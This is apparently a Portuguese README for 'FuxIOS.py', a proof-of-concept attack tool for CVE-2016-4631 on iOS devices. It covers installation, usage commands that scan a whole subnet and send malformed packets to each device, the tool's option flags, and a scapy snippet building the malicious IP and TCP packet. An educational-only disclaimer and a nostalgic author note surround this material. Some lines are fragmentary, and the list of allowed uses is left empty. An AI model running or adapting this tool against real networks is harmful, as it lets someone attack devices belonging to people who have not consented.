
🎯 FuxiOS.py v2.0 - CVE-2016-4631 Exploit PoC modernizado
Por que publico isso agora?
Enquanto revisava discos rígidos antigos e repositórios esquecidos, me deparei com este script que escrevi há anos, quando mal começava minha carreira em cibersegurança. Era uma época diferente – Python 2.7 dominava, as vulnerabilidades como CVE‑2016‑4631 eram o pão de cada dia, e cada PoC que funcionava parecia uma pequena vitória.
Ao ver este código depois de tanto tempo, não pude evitar sentir nostalgia. Lembrei daquelas noites depurando exploits, a emoção de ver "Payload sent successfully", e como cada script era um passo a mais no meu aprendizado. Embora hoje em dia trabalhe com tecnologias muito mais avançadas, este pequeno script representa aqueles primeiros passos no mundo da segurança ofensiva.
Decidi modernizá‑lo e publicá‑lo não apenas por nostalgia, mas porque acredito que pode ser útil para outros que estão começando seu caminho em cibersegurança. É um lembrete de que todos começamos em algum lugar, e que esses primeiros scripts "simples" são a base de tudo que vem depois.
F0LloW_Th3_R4ts era minha assinatura naquela época... alguns códigos nunca se esquecem. 🐀
- BONKERS, Julho 2025
FuxIOS.py é um Proof of Concept (PoC) atualizado para a vulnerabilidade CVE-2016-4631 que afeta dispositivos iOS. Esta versão foi completamente reescrita e modernizada para Python 3 com melhorias significativas em funcionalidade, segurança e usabilidade.
list_of_ips → list_ips# Instalar nmap (requerido por python-nmap)
# Windows: Baixar de https://nmap.org/download.html
# Linux: sudo apt-get install nmap
# macOS: brew install nmap
# Clonar repositório
git clone <repo-url>
cd FuxiOS
# Instalar dependências
pip install -r requirements.txt
# Ou manualmente:
pip install scapy python-nmap
# Uso básico
sudo python3 FuxIOS.py
# Configuração personalizada
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24
# Opções avançadas
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24 -m 50 -d 0.1
# Ver ajuda
python3 FuxIOS.py -h
sudo python3 FuxIOS.py --interactive
-s, --source: IP de origem do ataque (padrão: 192.168.1.95)-n, --network: Subrede alvo (padrão: 192.168.1.0/24)-m, --max-payload: Tamanho máximo do payload (padrão: 40)-d, --delay: Atraso entre pacotes em segundos (padrão: 0.2)--interactive: Modo interativo para compatibilidade# Pacote malicioso
IP(src=source_ip, dst=target_ip, options=malformed_payload) /
TCP(dport=80, flags="S", options=[(19, b"x"*18), (19, b"x"*18)])
Esta ferramenta deve ser utilizada exclusivamente para:
Os logs são salvos em fuxios_exploit.log e incluem:
Erro: "No module named 'scapy'"
pip install scapy
Erro: "No module named 'nmap'"
pip install python-nmap
# E certifique-se de ter nmap instalado no sistema
Erro: "Permission denied"
# Linux/macOS
sudo python3 FuxIOS.py
# Windows
# Executar PowerShell/CMD como administrador
Windows: "WinPcap/Npcap not found"
Este projeto é apenas para fins educacionais. O autor não se responsabiliza pelo mau uso desta ferramenta.
Lembre-se: "F0LloW_Th3_R4ts <:8)~~ <:8)~~"